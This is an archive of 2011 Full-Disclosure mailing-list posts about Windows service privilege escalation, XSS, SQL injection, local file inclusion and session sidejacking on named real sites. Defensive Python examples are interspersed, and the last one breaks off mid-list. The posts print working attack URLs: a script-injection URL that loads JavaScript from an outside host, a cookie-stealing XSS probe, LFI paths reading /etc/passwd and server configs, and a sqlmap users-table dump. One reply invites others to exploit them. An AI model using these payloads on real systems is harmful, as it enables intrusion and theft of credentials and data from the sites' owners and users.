Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread Madhur Ahuja
I agree. I am only talking of the scenario where this service is
pre-installed.


On Monday, September 26, 2011, Thor (Hammer of God) wrote:

>  You'd have to be admin to install as a service, and the service would
> obviously need to then be running as local system to be of benefit (beyond
> what a normal user could do anyway) AND the installer would have to grant a
> normal user rights to overwrite it.
>
>  Certainly possible, but the developer would have to go out of their way
> to screw that up. And if they did, it still wouldn't be because of the OS...
>
>  T
>
>
> On Sep 25, 2011, at 6:18 PM, "Travis Biehn"  wrote:
>
>   GloW: there's a lot of 3rd party software that installs itself as
> windows services.
>
>  -Travis
>
> On Sun, Sep 25, 2011 at 9:15 PM, GloW - XD  wrote:
>
> Haha , too good and too true thor !
>
>
> Maybe he can trick the user into installing on a FAT32 partition first, and
> THEN get them to execute from a remote share!
>
>  Rofl x10.
>
> Agreed, this kind of attack is NOT feasible in 2011, try maybe 2006.
>
> Anyhow it has been a pleasure, ending this BS I think once and for all,
> look up how winlogon works for one thing, then look at how windows creates
> and maintains a service_table, and then at the DLLs, which are protected ofc,
> you cannot touch msgina.dll without A LOT of help from a rootkit or something
> similar, in which case, why would you need to?
> You could add an admin, hidden, in a simple batfile script (yes I do have
> my own code but no it is not for kids..), this is 10 seconds and hidden, so
> when you have gotten that far, why would you bother to hijack a DLL?
>
> You CANNOT do crap without complete ADMIN, not SYSTEM, ADMIN$ share, and
> total access to all sockets, meaning all pipe control, and that's where half of
> windows exchanges smb shares for one thing. You guys don't seem to know CRAP
> about windows to start with, then have the gall to raise such a frigging
> ridiculous topic about a non-happening. YOUTUBE ONE 'real' event of this
> being useful, or even just working, and I would look, but you won't, cannot,
> and will never be able to, especially on newer systems like Windows 7-8.
> As I said earlier, enjoy your BS DLL hijacking, but MS don't care for it,
> and whatever patches they instilled don't touch even service_table.. so,
> they have not given it a high prio, and why should they.
>
> This is simply a case of a secteam gaining notoriety, to try and make this
> a 'big bug!!', to try and gain brownie points from MS. Even though I don't
> believe in many things MS, I know the windows system, and how to break it,
> better than many people, and I can tell you now, this whole DLL hijack is a
> complete and utter waste of your time.
> But... keep on going, maybe MS will send you another 'thankyou' email ;)
> xd / <http://crazycoders.com>crazycoders.com / #haxnet@Ef
>
>
>
>
>
> On 26 September 2011 10:52, Thor (Hammer of God) wrote:
>
>  Maybe he can trick the user into installing on a FAT32 partition first,
> and THEN get them to execute from a remote share!
>
> On Sep 25, 2011, at 5:30 PM, "Travis Biehn"  wrote:
>
>   It might be a fun experiment to see what DLLs they're looking for :.)
>
>
> -Travis
>
> On Sun, Sep 25, 2011 at 2:57 PM,  wrote:
>
> To replace a service executable you usually need administrator access
> anyway.
>
>
> --Original Message--
> From: Madhur Ahuja
> Sender:
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread Madhur Ahuja
I haven't sent this email without doing a proof of concept. It actually works
with *Google Update Service*.

The restricted user can replace GoogleUpdate.exe to execute malicious code.
This service is installed by any Google component, such as Picasa, Google
Talk, etc.

http://www.google.com/support/installer/bin/answer.py?answer=98805

Madhur

On Monday, September 26, 2011, GloW - XD wrote:

> Haha , too good and too true thor !
>
> Maybe he can trick the user into installing on a FAT32 partition first, and
> THEN get them to execute from a remote share!
>
> Rofl x10.
>
> Agreed, this kind of attack is NOT feasible in 2011, try maybe 2006.
>
> Anyhow it has been a pleasure, ending this BS I think once and for all,
> look up how winlogon works for one thing, then look at how windows creates
> and maintains a service_table, and then at the DLLs, which are protected ofc,
> you cannot touch msgina.dll without A LOT of help from a rootkit or something
> similar, in which case, why would you need to?
> You could add an admin, hidden, in a simple batfile script (yes I do have
> my own code but no it is not for kids..), this is 10 seconds and hidden, so
> when you have gotten that far, why would you bother to hijack a DLL?
>
> You CANNOT do crap without complete ADMIN, not SYSTEM, ADMIN$ share, and
> total access to all sockets, meaning all pipe control, and that's where half of
> windows exchanges smb shares for one thing. You guys don't seem to know CRAP
> about windows to start with, then have the gall to raise such a frigging
> ridiculous topic about a non-happening. YOUTUBE ONE 'real' event of this
> being useful, or even just working, and I would look, but you won't, cannot,
> and will never be able to, especially on newer systems like Windows 7-8.
> As I said earlier, enjoy your BS DLL hijacking, but MS don't care for it,
> and whatever patches they instilled don't touch even service_table.. so,
> they have not given it a high prio, and why should they.
>
> This is simply a case of a secteam gaining notoriety, to try and make this
> a 'big bug!!', to try and gain brownie points from MS. Even though I don't
> believe in many things MS, I know the windows system, and how to break it,
> better than many people, and I can tell you now, this whole DLL hijack is a
> complete and utter waste of your time.
> But... keep on going, maybe MS will send you another 'thankyou' email ;)
> xd / crazycoders.com / #haxnet@Ef
>
>
>
>
> On 26 September 2011 10:52, Thor (Hammer of God) wrote:
>
>  Maybe he can trick the user into installing on a FAT32 partition first,
> and THEN get them to execute from a remote share!
>
> On Sep 25, 2011, at 5:30 PM, "Travis Biehn"  wrote:
>
>   It might be a fun experiment to see what DLLs they're looking for :.)
>
>
> -Travis
>
> On Sun, Sep 25, 2011 at 2:57 PM,  wrote:
>
> To replace a service executable you usually need administrator access
> anyway.
>
>
> --Original Message--
> From: Madhur Ahuja
> Sender: full-disclosure-boun...@lists.grok.org.uk
> To: security-bas...@securityfocus.com
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Privilege escalation on Windows using
> BinaryPlanting
> Sent: 25 Sep 2011 19:31
>
> Imagine a situation where I have a Windows system with restricted
> user access and want to get Administrator access.
>
> There are many services in Windows which run with the SYSTEM account.
>
> If there exists even one such service whose executable is not
> protected by Windows File Protection, isn't it possible to execute
> malicious code (such as gaining Administrator access) simply by
> replacing the service executable with a malicious one and then
> restarting the service?
>
> As a restricted user, what's stopping me from doing this?
>
> Is there any integrity check performed by services.msc or the service
> itself before executing with the SYSTEM account?
>
> Madhur
>
>
>  Sent from my POS BlackBerry  wireless device, which may wipe itself at
> any moment
>
>
>
>

[Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread Madhur Ahuja
Imagine a situation where I have a Windows system with restricted
user access and want to get Administrator access.

There are many services in Windows which run with the SYSTEM account.

If there exists even one such service whose executable is not
protected by Windows File Protection, isn't it possible to execute
malicious code (such as gaining Administrator access) simply by
replacing the service executable with a malicious one and then
restarting the service?

As a restricted user, what's stopping me from doing this?

Is there any integrity check performed by services.msc or the service
itself before executing with the SYSTEM account?

Madhur


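The condition the original post asks about is checkable: a service that starts as SYSTEM from an executable, or from a directory, that a normal user can write to. The following is an added example, not code from this thread or from any vendor. The service records and the `icacls` output it parses are constructed for the example (the service names, paths and ACEs are hypothetical); on a real host you would feed it `Get-CimInstance Win32_Service` or `sc qc` data, with the executable stripped out of any quoted PathName with arguments, and the output of `icacls <path>` for each binary and its parent directory.

```python
"""Flag SYSTEM services whose binary (or its directory) a low-privilege user
can overwrite. Added example; inputs below are constructed, not real hosts."""
import ntpath
import re

# Groups every interactive, non-admin user belongs to (compared lower-cased).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}

# icacls right tokens that allow overwriting, renaming or deleting the object:
# the simple rights F/M/W and the specific rights WD/AD/D/DC/WDAC/WO/GA/GW.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "DC", "WDAC", "WO", "GA", "GW"}

# Start-name values that mean "runs as LocalSystem" (a NULL/empty start name
# at CreateService time also means LocalSystem).
SYSTEM_ACCOUNTS = {"localsystem", r"nt authority\system", ""}

_ACE_RE = re.compile(r"^(?P<who>.+?):(?P<rights>(?:\([^()]*\))+)\s*$")


def parse_icacls(path, output):
    """Turn `icacls <path>` output into (principal, tokens, is_deny) tuples.
    The first output line starts with the path; later lines are indented."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = _ACE_RE.match(line)
        if not m:
            continue
        tokens = set()
        for group in re.findall(r"\(([^()]*)\)", m.group("rights")):
            tokens.update(t.strip() for t in group.split(","))
        aces.append((m.group("who").strip().lower(), tokens, "DENY" in tokens))
    return aces


def writable_by_low_priv(aces):
    """True if a low-privilege principal holds an allow ACE with a write right.
    Deny ACEs are skipped rather than subtracted; treat hits as leads to verify."""
    return any(
        who in LOW_PRIV_PRINCIPALS and not deny and bool(tokens & WRITE_RIGHTS)
        for who, tokens, deny in aces
    )


def find_replaceable_system_services(services, icacls_by_path):
    """services: iterable of (name, start_account, binary_path).
    icacls_by_path: raw icacls output keyed by path, for each binary and its
    parent directory. A writable directory counts too: the real file can be
    renamed away and a new one dropped under the same name."""
    hits = []
    for name, account, exe in services:
        if account.lower() not in SYSTEM_ACCOUNTS:
            continue
        exe_dir = ntpath.dirname(exe)
        file_aces = parse_icacls(exe, icacls_by_path.get(exe, ""))
        dir_aces = parse_icacls(exe_dir, icacls_by_path.get(exe_dir, ""))
        if writable_by_low_priv(file_aces) or writable_by_low_priv(dir_aces):
            hits.append(name)
    return hits


# Constructed sample: a hypothetical vendor updater whose binary inherited a
# BUILTIN\Users:(F) ACE, a correctly protected service, and a non-SYSTEM one.
SAMPLE_SERVICES = [
    ("ExampleUpdater", "LocalSystem", r"C:\ProgramData\ExampleVendor\updater.exe"),
    ("GoodService", "LocalSystem", r"C:\Program Files\Good\good.exe"),
    ("UserAgent", r"NT AUTHORITY\LocalService", r"C:\ProgramData\ExampleVendor\agent.exe"),
]

SAMPLE_ICACLS = {
    r"C:\ProgramData\ExampleVendor\updater.exe":
        r"C:\ProgramData\ExampleVendor\updater.exe BUILTIN\Users:(I)(F)" "\n"
        r"                                          NT AUTHORITY\SYSTEM:(I)(F)" "\n"
        r"                                          BUILTIN\Administrators:(I)(F)" "\n"
        "\nSuccessfully processed 1 files; Failed processing 0 files\n",
    r"C:\ProgramData\ExampleVendor":
        r"C:\ProgramData\ExampleVendor BUILTIN\Users:(OI)(CI)(RX)" "\n"
        r"                             BUILTIN\Administrators:(OI)(CI)(F)" "\n",
    r"C:\Program Files\Good\good.exe":
        r"C:\Program Files\Good\good.exe NT AUTHORITY\SYSTEM:(I)(F)" "\n"
        r"                               BUILTIN\Administrators:(I)(F)" "\n"
        r"                               BUILTIN\Users:(I)(RX)" "\n",
    r"C:\Program Files\Good":
        r"C:\Program Files\Good BUILTIN\Users:(OI)(CI)(RX)" "\n"
        r"                      BUILTIN\Administrators:(OI)(CI)(F)" "\n",
}

if __name__ == "__main__":
    print(find_replaceable_system_services(SAMPLE_SERVICES, SAMPLE_ICACLS))
```

A hit only says the ACL permits the overwrite; confirming it still means replacing the file and getting the service restarted (a restart usually needs the service's own start/stop rights or a reboot), which is the part the replies above argue over. Deny ACEs and group nesting are not evaluated here, so verify every hit by hand before calling it a finding.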

Re: [Full-disclosure] XSS Vulnerability in www.emerson.com

2011-09-05 Thread Madhur Ahuja
The URL is publicly visible in the address bar if you open the site in Chrome.
Not sure how you are categorizing it as "no one knows the URL".

Try the "Email this Article" link on the page below:

http://www.emerson.com/en-US/newsroom/news-releases/emerson-financial-news/Pages/Emerson-to-Sell-Heating-Products-Business.aspx

Madhur

On Monday, September 5, 2011, Mr. Hinky Dink wrote:

>
> That... ahem... particular company has had that particular page
> (/MCS/email.apsx) in one form or another for a long time, since the late
> 90s at least, when it was a cgi app.
>
> IIRC, at one time you could SPAM anyone through it, but they learned
> their lesson and now you can only SPAM the company's employees.
> Considering the business they're in (think "SCADA" related) this could
> be a Bad Thing.  The XSS is just the icing on the cake.
>
> I find it interesting that they "upgraded" it to SharePoint.
>
> It's an in-house app, one of several.  I believe the security model used
> to be "no one knows the URL".
>
> I'm guessing you're a contractor for that particular company because,
> after all, no one knows the URL.
>
> On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote:
> > One of the pages on the Emerson site is rendering the query string
> > parameter without any inspection. This makes it possible to inject
> > malicious content as shown below:
> >
> >
> >
> > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%
> > 20src='
> http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E
> >
> >
> >
> >
> >
> >
> > http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%
> > 22http://madhur.github.com/files/js/site.js%22%20type=%
> > 22text/javascript%22%3E
> >
> >
> > --
> > Madhur

[Full-disclosure] XSS Vulnerability in www.emerson.com

2011-09-04 Thread Madhur Ahuja
One of the pages on the Emerson site is rendering the query string parameter
without any inspection. This makes it possible to inject malicious content
as shown below:


http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg%20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E



http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=%22http://madhur.github.com/files/js/site.js%22%20type=%22text/javascript%22%3E

--
Madhur

Re: [Full-disclosure] Context IS Advisory - MS11-066 .NET 4 - Microsoft Chart Control

2011-08-12 Thread Madhur Ahuja
Is there a POC or an exploit already for this vulnerability ?

On Thu, Aug 11, 2011 at 9:38 PM, Context IS - Disclosure
 wrote:
> ===ADVISORY===
> Systems Affected:    .NET 4 - Microsoft Chart Control
> Severity:            High
> Category:            Information Disclosure
> Author:              Context Information Security Ltd
> Reported to vendor:  3rd October 2010
> Advisory Issued:     11th August 2011
> Reference:           MS11-066, CVE-2011-1977
> ===ADVISORY===
>
> Description
> ---
> The Microsoft Chart Control is vulnerable to an information disclosure 
> vulnerability. By sending a specific GET request to an application 
> implementing the chart control, attackers could read arbitrary files on the 
> system.
>
> Analysis
> 
> The Microsoft Chart Control plots graphs and with the default configuration 
> stores those as image files in a directory on the system. The graph images 
> are retrieved using GET requests and a file path parameter.
>
> When the control retrieves a request, it verifies that the requested file 
> path lies within the allowed directory and if so reads and returns the file’s 
> contents. However, the verification process was found to be flawed, resulting 
> in the ability to traverse directories to load arbitrary files.
>
> The Microsoft Chart Control is included in the .NET Framework 4 or can be 
> downloaded separately for .NET 3.5 (http://code.msdn.microsoft.com/mschart).
>
> This vulnerability was found using the Context App Tool (CAT 
> http://cat.contextis.com).
>
> Technologies Affected
> -
>
> Microsoft .Net Framework 4
>
>
> Vendor Response
> ---
> Microsoft advises users to patch the .Net Framework to the latest version.  
> See the following Microsoft security bulletin for more details:
> http://www.microsoft.com/technet/security/Bulletin/MS11-066.mspx
>
>
> Disclosure Timeline
> ---
> 3rd October 2010 – Vendor Notification
> 4th October 2010 – First Vendor Response
> 16th November 2010 – Vendor Confirms Vulnerability
> 9th August 2011 – Vendor Patch Released
>
>
> Credits
> 
> Nico Leidecker and James Forshaw of Context Information Security Ltd
>
>
> About Context Information Security
> --
>
> Context Information Security is an independent security consultancy 
> specialising in both technical security and information assurance services.
>
> The company was founded in 1998. Its client base has grown steadily over the 
> years, thanks in large part to personal recommendations from existing clients 
> who value us as business partners. We believe our success is based on the 
> value our clients place on our product-agnostic, holistic approach; the way 
> we work closely with them to develop a tailored service; and to the 
> independence, integrity and technical skills of our consultants.
>
> The company’s client base now includes some of the most prestigious blue chip 
> companies in the world, as well as government organisations.
>
> The best security experts need to bring a broad portfolio of skills to the 
> job, so Context has always sought to recruit staff with extensive business 
> experience as well as technical expertise. Our aim is to provide effective 
> and practical solutions, advice and support: when we report back to clients 
> we always communicate our findings and recommendations in plain terms at a 
> business level as well as in the form of an in-depth technical report.
>
> Web:        www.contextis.com
> Email:      disclos...@contextis.com
>
>
>
>

[Full-disclosure] SQL Injection on http://www.salk.edu/events/index.php?id=150

2011-07-25 Thread Madhur Ahuja
Retrieved data using sqlmap:

Public Database: salkpublicweb2

Tables:

[5 tables]
+--+
| category |
| faculty  |
| page |
| users|
| video|
+--+

The users table contains around 80 username and password entries which
can be easily retrieved.

Madhur


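The pattern behind an index.php?id=150 style injection is an id parameter concatenated into SQL. The following is an added example, not the salk.edu application's code: the vulnerable query beside the parameterised one, run against a constructed in-memory SQLite database so it executes offline. The schema borrows two of the table names from the sqlmap output above; the rows and columns are made up.

```python
"""Concatenated id parameter versus a bound one. Added example; the database
contents are constructed, not data from any real site."""
import sqlite3


def make_db():
    """Constructed schema loosely modelled on the table names in the post."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE page (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO page VALUES (150, 'Public event', 1);
        INSERT INTO page VALUES (151, 'Draft event', 0);
        INSERT INTO users VALUES (1, 'admin', 'hunter2');
    """)
    return conn


def event_titles_vulnerable(conn, raw_id):
    """Untrusted text becomes SQL syntax: 'OR 1=1 --' drops the published
    filter, 'UNION SELECT' reads other tables (this is what sqlmap automates)."""
    sql = "SELECT title FROM page WHERE id = " + raw_id + " AND published = 1"
    return [row[0] for row in conn.execute(sql)]


def event_titles_fixed(conn, raw_id):
    """Check the type, then bind the value; the driver sends it as data, so
    the same payloads are either rejected or match nothing."""
    try:
        event_id = int(raw_id)
    except ValueError:
        return []
    rows = conn.execute(
        "SELECT title FROM page WHERE id = ? AND published = 1", (event_id,)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    for raw in ("150", "150 OR 1=1 --",
                "0 UNION SELECT username || ':' || password FROM users --"):
        print(repr(raw), event_titles_vulnerable(db, raw), event_titles_fixed(db, raw))
```

The integer cast is belt-and-braces: binding alone already prevents the injection, but rejecting non-numeric ids early also keeps junk out of the logs and gives the application a clean place to return 400.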

Re: [Full-disclosure] Contact for reporting Facebook vulnerability

2011-06-13 Thread Madhur Ahuja
Guys, can we close this discussion now, since the vulnerability I was
talking about is session sidejacking, and it's something applicable to all
sites, not just Facebook.

Thanks,
Madhur

On Mon, Jun 13, 2011 at 10:21 AM, TAS  wrote:
> And you think you couldn't have got that before you even posted on the list!
>
>
> -
> TAS
> http://twitter.com/p0wnsauc3
>
> -Original Message-
> From: Madhur Ahuja 
> Sender: full-disclosure-boun...@lists.grok.org.uk
> Date: Sat, 11 Jun 2011 15:59:20
> To: adam
> Cc: 
> Subject: Re: [Full-disclosure] Contact for reporting Facebook vulnerability
>
> I found the link to form through this forum.
>
> On Sat, Jun 11, 2011 at 3:52 PM, adam  wrote:
>> Absolutely loved that last reply, Andrew.
>> Madhur, you found a form to report security issues to Facebook and instead
>> came here, to ask where you should go to report vulnerabilities to Facebook?
>> Does that make sense to you?
>>
>> On Sat, Jun 11, 2011 at 2:41 PM, Andrew D Kirch  wrote:
>>>
>>> Nah, report it here, bleach the hat later.
>>>
>>> On 6/11/2011 3:12 PM, Madhur Ahuja wrote:
>>> > Shouldn't I first report to Facebook at
>>> > http://www.facebook.com/help/contact.php?show_form=white_hat
>>> > ?
>>> >
>>> > On Sat, Jun 11, 2011 at 3:10 PM, Andrew D Kirch
>>> >  wrote:
>>> >> On 6/11/2011 2:51 PM, Madhur Ahuja wrote:
>>> >>> Does anyone know where I can report vulnerabilities in Facebook ?
>>> >>>
>>> >>> Thanks,
>>> >>> Madhur
>>> >>>
>>> >> Right here, simply reply to this e-mail.
>>> >>
>>> >> Andrew
>>> >>
>>> >>
>>>

[Full-disclosure] Session Sidejacking in facebook

2011-06-11 Thread Madhur Ahuja
Recently, there was a vulnerability discovered in LinkedIn, which is
described here: http://www.wtfuzz.com/blogs/linkedin-ssl-cookie-vulnerability/

Basically, this allows someone on the network to sniff a cookie value and
apply it in his browser session to hijack the target's user session.

This simple concept works even on Facebook. I was able to hijack
n number of users' sessions sitting in my university room in a few
minutes.

For every POST request in Facebook, a similar cookie string is transmitted:

Cookie: datr=09bXXXQ2oOgQuUK0yAzK_JU9; lu=wgj9pmpkAsdXXXTp5vthfh2w;
locale=en_US; L=2; act=13078123502562F3; c_user=xx;
sct=1123416461; xs=603Afe43db8a71239bd8d7b2a831xxx6241f;
presence=EM307818375L26REp_5f123422481F22X3078XXX1367K1H0V0Z21G307818375PEuoFD769839560FDexpF1307818409174EflF_5b_5dEolF-1;
e=n

I was able to hijack the remote user's session by just placing the
values of 2 cookies: c_user (which is obviously the user id) and xs (seems
like an auth token) in my browser session.

Step by step POC:
http://madhur.github.com/blog/2011/06/12/facebooksessionhijacking.html

Is this how it works in all social sites ?

If the answer is yes, I will be highly doubtful of using the internet at
any public place where sniffing or a MITM attack is relatively simple to
make.

Are there any measures to prevent it ?

Madhur
http://madhur.github.com


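The weakness behind the hijack described above is a session cookie that is not marked Secure, so the browser also sends it over plain HTTP where anyone on the path can read it. The following is an added example, not Facebook's or LinkedIn's code: an audit of Set-Cookie headers for that property. The responses are constructed; c_user and xs are the two cookie names from the post, every value and domain is made up.

```python
"""Audit Set-Cookie headers for session cookies missing Secure / HttpOnly.
Added example; the headers are constructed, not captured from any site."""
from http.cookies import SimpleCookie

# Cookies that by themselves authenticate the user (the two the post says
# had to be copied to take over the session).
SESSION_COOKIES = {"c_user", "xs"}


def audit_set_cookie_headers(headers):
    """headers: list of (name, value) pairs as received from the server.
    Returns {cookie_name: [problem, ...]} for every session cookie seen;
    an empty list means the cookie carries both flags."""
    findings = {}
    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        jar = SimpleCookie()
        jar.load(value)
        for cname, morsel in jar.items():
            if cname not in SESSION_COOKIES:
                continue
            problems = []
            if not morsel["secure"]:
                problems.append("no Secure flag: browser sends it over http:// too")
            if not morsel["httponly"]:
                problems.append("no HttpOnly flag: readable by injected script")
            findings[cname] = problems
    return findings


# Constructed responses: the weak form and the corrected form.
WEAK_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "c_user=100001234567890; Path=/; Domain=.example.com"),
    ("Set-Cookie", "xs=0123456789abcdef0123456789abcdef; Path=/; Domain=.example.com; HttpOnly"),
    ("Set-Cookie", "locale=en_US; Path=/; Domain=.example.com"),
]
FIXED_HEADERS = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "c_user=100001234567890; Path=/; Domain=.example.com; Secure; HttpOnly"),
    ("Set-Cookie", "xs=0123456789abcdef0123456789abcdef; Path=/; Domain=.example.com; Secure; HttpOnly"),
]

if __name__ == "__main__":
    print(audit_set_cookie_headers(WEAK_HEADERS))
    print(audit_set_cookie_headers(FIXED_HEADERS))
```

The Secure flag answers the question at the end of the post: a cookie with it is never sent over http://, so a sniffer on the LAN sees nothing to replay. It only helps if the site serves every authenticated page over HTTPS; the HSTS header in the corrected response is there so the browser refuses a downgrade to plain HTTP in the first place. HttpOnly is a separate defence against the cookie being read by script and does nothing against sniffing.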

Re: [Full-disclosure] Contact for reporting Facebook vulnerability

2011-06-11 Thread Madhur Ahuja
I found the link to form through this forum.

On Sat, Jun 11, 2011 at 3:52 PM, adam  wrote:
> Absolutely loved that last reply, Andrew.
> Madhur, you found a form to report security issues to Facebook and instead
> came here, to ask where you should go to report vulnerabilities to Facebook?
> Does that make sense to you?
>
> On Sat, Jun 11, 2011 at 2:41 PM, Andrew D Kirch  wrote:
>>
>> Nah, report it here, bleach the hat later.
>>
>> On 6/11/2011 3:12 PM, Madhur Ahuja wrote:
>> > Shouldn't I first report to Facebook at
>> > http://www.facebook.com/help/contact.php?show_form=white_hat
>> > ?
>> >
>> > On Sat, Jun 11, 2011 at 3:10 PM, Andrew D Kirch
>> >  wrote:
>> >> On 6/11/2011 2:51 PM, Madhur Ahuja wrote:
>> >>> Does anyone know where I can report vulnerabilities in Facebook ?
>> >>>
>> >>> Thanks,
>> >>> Madhur
>> >>>
>> >> Right here, simply reply to this e-mail.
>> >>
>> >> Andrew
>> >>
>> >>
>>

Re: [Full-disclosure] Contact for reporting Facebook vulnerability

2011-06-11 Thread Madhur Ahuja
Shouldn't I first report to Facebook at
http://www.facebook.com/help/contact.php?show_form=white_hat
?

On Sat, Jun 11, 2011 at 3:10 PM, Andrew D Kirch  wrote:
> On 6/11/2011 2:51 PM, Madhur Ahuja wrote:
>> Does anyone know where I can report vulnerabilities in Facebook ?
>>
>> Thanks,
>> Madhur
>>
> Right here, simply reply to this e-mail.
>
> Andrew
>


[Full-disclosure] Contact for reporting Facebook vulnerability

2011-06-11 Thread Madhur Ahuja
Does anyone know where I can report vulnerabilities in Facebook ?

Thanks,
Madhur



Re: [Full-disclosure] University of Central Florida Multiple LFI

2011-02-19 Thread Madhur Ahuja
/etc/passwd is common location for passwd file. I didn't use any
techneek

On Sat, Feb 19, 2011 at 9:40 PM, Benji  wrote:

> Also Madhur how did you manage to find the /etc/passwd file? Whats ur
> techneek?
>
> Thx
>
> Benji
> IRC AND SILC USER - CEH
>
> On Sat, Feb 19, 2011 at 4:05 PM, Benji  wrote:
>
>> rabble rabble rablle check out my pjear leet php auditing skills while
>> advertising website rah rah rah
>>
>> Benji
>> Administrator - http://mostof.ac.uk
>>
>>
>> On Sat, Feb 19, 2011 at 4:03 PM, Hack Talk wrote:
>>
>>> Yea I was poking around the passwd file too. Looks like excel.ucf is
>>> running Debian while chemistry.cos.ucf is running CentOS.
>>>
>>>
>>> Luis Santana - Security+
>>> Administrator - http://hacktalk.net
>>> HackTalk Security - Security From The Underground
>>>
>>>
>>>
>>> On Sat, Feb 19, 2011 at 6:04 AM, Madhur Ahuja wrote:
>>>
>>>>
>>>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
>>>>
>>>> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk wrote:
>>>>
>>>>> Found these and thought I'd share:
>>>>>
>>>>> -==-
>>>>>
>>>>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>>>>>
>>>>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>>>>> -==-
>>>>> Let me know if you do anything fun with 'em
>>>>>
>>>>> Luis Santana - Security+
>>>>> Administrator - http://hacktalk.net
>>>>> HackTalk Security - Security From The Underground
>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>

Re: [Full-disclosure] University of Central Florida Multiple LFI

2011-02-19 Thread Madhur Ahuja
http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00

On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk  wrote:

> Found these and thought I'd share:
>
> -==-
>
> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>
> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
> -==-
> Let me know if you do anything fun with 'em
>
> Luis Santana - Security+
> Administrator - http://hacktalk.net
> HackTalk Security - Security From The Underground
>
>

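Both the Context advisory above (MS11-066: a file-path check that was meant to keep requests inside the chart image directory but could be traversed) and the UCF LFI URLs (`../../etc/passwd%00`) come down to the same check being done wrong. The following is an added example, not Microsoft's chart control code and not the UCF sites' PHP. It shows the generic flawed form, a textual prefix test, beside a check that URL-decodes once, rejects NUL bytes (the %00 in the LFI URLs, which truncated the filename in older PHP builds so an appended extension was ignored), refuses absolute paths and compares canonical paths. The advisory does not say how the real control's check failed, so the flawed version here is the common pattern, not the actual bug. BASE and the requests are constructed, and POSIX paths are used so it runs anywhere.

```python
"""Prefix-test path check (flawed) versus a canonicalising containment check.
Added example; BASE and all requests are constructed."""
import posixpath
from urllib.parse import unquote

BASE = "/var/www/charts"   # hypothetical directory the images are served from


def prefix_check_allowed(requested):
    """Flawed: joins and tests the string prefix only. '..' segments and NUL
    bytes both pass because nothing is decoded or normalised."""
    candidate = BASE + "/" + requested
    return candidate.startswith(BASE + "/")


def resolve_request(requested):
    """Return the canonical path if it stays inside BASE, else None.
    Decode once, refuse NUL, refuse absolute paths, normalise, then check
    containment with commonpath (a prefix test would also accept BASE + 'x')."""
    decoded = unquote(requested)
    if "\x00" in decoded:
        return None
    if posixpath.isabs(decoded):
        return None
    candidate = posixpath.normpath(posixpath.join(BASE, decoded))
    if posixpath.commonpath([BASE, candidate]) != BASE:
        return None
    return candidate


if __name__ == "__main__":
    for req in ("chart_1.png", "sub/../chart_2.png",
                "../../../../etc/passwd", "../../../../etc/passwd%00",
                "%2e%2e/%2e%2e/%2e%2e/etc/httpd/conf/httpd.conf", "/etc/passwd"):
        print(repr(req), prefix_check_allowed(req), resolve_request(req))
```

On a real server add `os.path.realpath` after normalisation so a symlink inside BASE cannot point back out, and decode exactly once: decoding again after the check is how `%252e%252e` style double-encoded traversal gets through.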
[Full-disclosure] Input not sanitized in Emerson network power

2011-01-31 Thread Madhur Ahuja
Found this search box last month which is not sanitizing any input :

http://www.emersonnetworkpower.com/en-US/SearchCenter/Pages/AllResults.aspx?k=%3Cscript%3Ealert(document.cookie)%3C/script%3E&s=Network%20Power%20Content_en-US_en-US

Have contacted the owner but there isn't any response. Maybe the
vulnerability isn't serious enough to exploit

--
Madhur
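This search box and the Email.aspx page reported above share the same reflected-parameter pattern. The following is an added example, not Emerson's code: it decodes the parameter from the two posted URLs, renders it into constructed page markup the unsafe way and with output encoding, and confirms the result the way a browser would, by parsing for `<script>` tags rather than by string matching. The page markup is made up; the URLs are the ones posted.

```python
"""Reflected parameter rendered raw versus HTML-encoded, checked by parsing.
Added example; the page template is constructed, the URLs are from the posts."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The two URLs posted, verbatim.
PAYLOAD_URLS = [
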